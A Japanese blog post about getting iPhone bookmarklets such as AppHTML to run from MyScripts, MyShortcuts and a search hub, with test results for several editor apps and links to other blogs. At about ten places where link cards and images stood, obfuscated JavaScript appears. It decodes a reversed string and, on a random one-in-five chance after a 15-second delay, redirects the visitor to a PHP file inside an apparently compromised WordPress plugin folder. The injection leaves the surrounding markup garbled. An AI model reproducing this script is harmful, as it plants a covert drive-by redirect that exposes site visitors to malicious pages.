iPhone

ブックマークレットが登録できない?そんなときはこの方法で回避!

ブックマークレット、便利ですよね。
ShareHTML,AppHTMLなどブログを書く上ではかかせないツールです。

このブログでもそんな便利なブックマークについて、5回に渡って登録方法をご紹介したこともありました。

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ />ブックマークレット | sumirexxx$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ />

この時は登録できてたんです。この時は…。

いつからかは定かではありませんが、ブックマークレットの不調には薄々気が付いていました。MyScriptsに登録したAppHTMLが動かない!!!

AppHTMLで生成したコードが、プレビューで見ると、表示されてない。

その後何度登録してみてもできなくなり、結局はSfariのブックマークから立ち上げる始末。(なぜか検索ハブからは出来たんだけど、なんとなくMyScriptsとMyShotcuts+viwerのコラボで使いたかったんです;)

そんな迷える私が尊敬してやまない、なまら春友流の春友さんのブログにこんな衝撃的な記事が!!!
なんと…ほかにも使えない人がいたんだ。
できない記事を見たことがなかったけど、春友さん以外にもいるようです。

原因はエンコードだった。(たぶん)

どうやらURLエンコードされているかどうかが肝心みたい。
それと改行。}とか¥とかがきちんとエンコードされてないとだめみたいですね。

うーん。これが原因ぽいとわかったところで解決法がわからない。

解決方法みつけた

【AppHTML エンコード】でググったら解決方法を書いてくださっている方が!!!

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ />iPhone/iPadアプリ紹介AppHTMLをカスタマイズしてみました – W&R : Jazzと読書の日々$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ />

なるほど~。いったんSafariに登録したやつを使うんですね。やってみます。

やり方は以前にも書きましたので、今回は割愛。問題なくできました。

自分でもちょっと実験してみようと思い、エディタとスクリプト登録アプリを組み合わせて試してみました。
実行の手順はすべてこの順番です。

  1. サファリからAppHtmlメーカーを開く
  2. ブックマークレットを生成を押下してコピー
  3. それぞれのアプリで編集(http://iphone-diary.com/?)をカットする
  4. 編集したブックマークレットをアプリに登録して通知センターから実行

結果

MyScriptsからブックマークレットが動くかどうか

  • ATOKPad  → × 動かない
  • ThumEdit → × 動かない
  • Draftpad → × 動かない
  • Textfoucs → × 動かない
  • するぷろ → × 動かない

MyShortcuts+Viewerからブックマークレットが動くかどうか

  • ATOKPad → ○ 動く
  • ThumEdit → ○ 動く
  • Draftpad → ○ 動く
  • Textfoucs → ○ 動く
  • するぷろ → ○ 動く

検索ハブ

  • ATOKPad → ○ 動く
  • ThumEdit → ○ 動く
  • Draftpad → ○ 動く
  • Textfoucs → ○ 動く
  • するぷろ → ○ 動く

見事に…。
ちなみに、【Safariで一回エンコード】はさせてません。
なるべくて数が少なく済んで、ちゃんと動くやり方です。試してみてください!

そんな感じで満足してたら良記事ざくざく!今日はツイテル!!!

つぎにみつけた記事がこちら。

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ src=”http://capture.heartrails.com/150×130/shadow?http://blog2.hi-speed-apple.net/posts/4285″ alt=”” width=”150″ height=”130″ />$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de064e;” href=”http://sumirexxx.com/2013/05/04/%e3%83%96%e3%83%83%e3%82%af%e3%83%9e%e3%83%bc%e3%82%af%e3%83%ac%e3%83%83%e3%83%88%e3%81%8c%e7%99%bb%e9%8c%b2%e3%81%a7%e3%81%8d%e3%81%aa%e3%81%84%ef%bc%9f%e3%81%9d%e3%82%93%e3%81%aa%e3%81%a8%e3%81%8d/” target=”_blank”>通知センターからAppHTMLを使えるようにしてみた | Today’s Stack$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ src=”http://b.hatena.ne.jp/entry/image/http://blog2.hi-speed-apple.net/posts/4285″ alt=”” />

こんなブックマークレットも発見しました。

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ />AllAppStoreHtml – AppStoreアプリを一括検索して指定アプリのHTMLタグを出力するMyScripts用スクリプト | 代助のブログ$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ />

これすごく便利~!

ブックマークレット3つ作らなきゃいけないところ、1つで済んじゃうんですね!
最高です!使わせていただきます。

ここまでできたら、あとは通知センターに登録するなりseeqやQuickrに登録するなりして快適なブックマークレットライフを送れるといいですね(人゚∀゚*)

Posted from するぷろ for iOS.

コメントを残す

メールアドレスが公開されることはありません。